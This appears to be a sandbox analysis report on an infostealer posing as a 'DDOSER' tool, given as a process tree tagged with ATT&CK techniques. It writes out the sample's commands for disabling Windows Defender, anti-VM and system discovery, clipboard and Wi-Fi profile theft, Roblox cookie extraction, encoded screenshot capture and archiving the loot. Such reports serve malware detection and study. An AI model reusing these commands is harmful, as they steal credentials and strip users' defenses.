PID 700 wrote to memory of 1184	700	cmd.exe	116

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4848	attrib.exe
4640	attrib.exe
4660	attrib.exe

C:\Users\Admin\AppData\Local\Temp\DDOSER FOR WINDOWS 11_protected.exe
"C:\Users\Admin\AppData\Local\Temp\DDOSER FOR WINDOWS 11_protected.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4508
- C:\Users\Admin\AppData\Local\Temp\DDOSER FOR WINDOWS 11_protected.exe
  "C:\Users\Admin\AppData\Local\Temp\DDOSER FOR WINDOWS 11_protected.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DDOSER FOR WINDOWS 11_protected.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4180
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DDOSER FOR WINDOWS 11_protected.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2960
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()""
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4260
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1096
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4448
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      System Location Discovery: System Language Discovery
      PID:4016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2368
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:1188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\DDOSER FOR WINDOWS 11_protected.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:3704
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\DDOSER FOR WINDOWS 11_protected.exe"
      4⤵
      Views/modifies file attributes
      PID:4848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:700
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3040
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:4628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2204
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3196
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1512
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4736
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:764
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3448
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3700
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      System Location Discovery: System Language Discovery
      Gathers system information
      PID:2108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4556
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      System Location Discovery: System Language Discovery
      PID:1388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2820
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4400
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bbqsosy4\bbqsosy4.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4232
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA76B.tmp" "c:\Users\Admin\AppData\Local\Temp\bbqsosy4\CSC132F4F5B8E76452C92CAC24B7251FFF9.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4632
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:740
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4448
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:4660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1072
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2748
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4052
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2136
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1588
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4688
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2612
  - - C:\Windows\SysWOW64\getmac.exe
      getmac
      4⤵
      PID:3964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4016
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI45082\rar.exe a -r -hp"grabber" "C:\Users\Admin\AppData\Local\Temp\xgHUO.zip" *"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3832
  - - C:\Users\Admin\AppData\Local\Temp\_MEI45082\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI45082\rar.exe a -r -hp"grabber" "C:\Users\Admin\AppData\Local\Temp\xgHUO.zip" *
      4⤵
      Executes dropped EXE
      PID:1084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2296
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
